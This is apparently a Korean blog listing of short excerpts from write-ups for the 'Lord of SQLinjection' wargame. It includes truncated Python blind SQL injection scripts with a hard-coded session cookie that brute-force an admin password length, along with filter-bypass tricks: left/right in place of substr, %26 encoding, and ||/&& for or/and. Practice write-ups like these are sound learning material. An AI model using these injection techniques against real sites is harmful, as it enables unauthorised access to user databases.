Lord of SQLinjection(18)
-
(los[Lord of SQLinjection]) DARKNIGHT
import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php?pw=&no=1 or id like %22admin%22 and length(pw) like " + str(k) r = requests.post(url, cookies=(dict(PHPSESSID="2o4ge7l7skce4kl1qhl8kkq404"))) print("try password length = " + str(k)) if 'Hello admin' in r.text: print("[+] find password length = " + str(k)) for j ..
2020.04.23 -
(los[Lord of SQLinjection]) GOLEM
substr이 필터링 당했다면 left 함수와 right 함수를 섞어서 사용함으로써 우회가 가능하다. 두 함수는 각각 1번째 인자로 들어온 값을 왼쪽, 오른쪽으로부터 2번째 인자로 들어온 값 만큼 잘라내는 함수이다. 이를 혼합해서 아래의 예제처럼 substr 함수를 대신할 수 있는 것이다. select right(left('asd',1),1) = 'a' select right(left('asd',2),1) = 's' select right(left('asd',3),1) = 'd' import requests password = "" for k in range(1, 20): url = "https://los.eagle-jump.org/golem_39f3348098ccda1e71a4650f40caa037.p..
2020.04.23 -
(los[Lord of SQLinjection]) SKELETOM 2020.04.23
-
(los[Lord of SQLinjection]) VAMPIRE 2020.04.23
-
(los[Lord of SQLinjection]) TROLL
@ereg 함수 검색 대상 문자열(string)에서 정규 표현식으로 나타낸 패턴(pattern)과 일치하는 문자열이 발견될 경우에 true를, 발견되지 않을 경우에는 false를 반환한다. 이때 대소문자는 구분한다.
2020.04.23 -
(los[Lord of SQLinjection]) ORGE
'&' 기호는 GET방식으로 전달되지 않는 다는 특징이 있기 때문에 URL 인코딩 값인 '%26'으로 변환하여 보낸다 우회문자 or -> || and -> && -> %26%26 # -> %23 공격에 성공하지 않았다. 저번 Orc 문제와 동일하게 대문자를 소문자로 바꿔서 했는데도 공격이 성공하질 않았다. 위의 두 번째 문단의 코드를 간과했기 때문이다. 즉, 첫 번째 문단의 코드에서는 id가 guest인 상태에서 pw를 입력 받았으나 두 번째 문단의 코드에서는 id가 admin인 상태에서 pw만 받는 것이였다. 그렇다면, pw만 입력하면 클리어되므로,
2020.04.23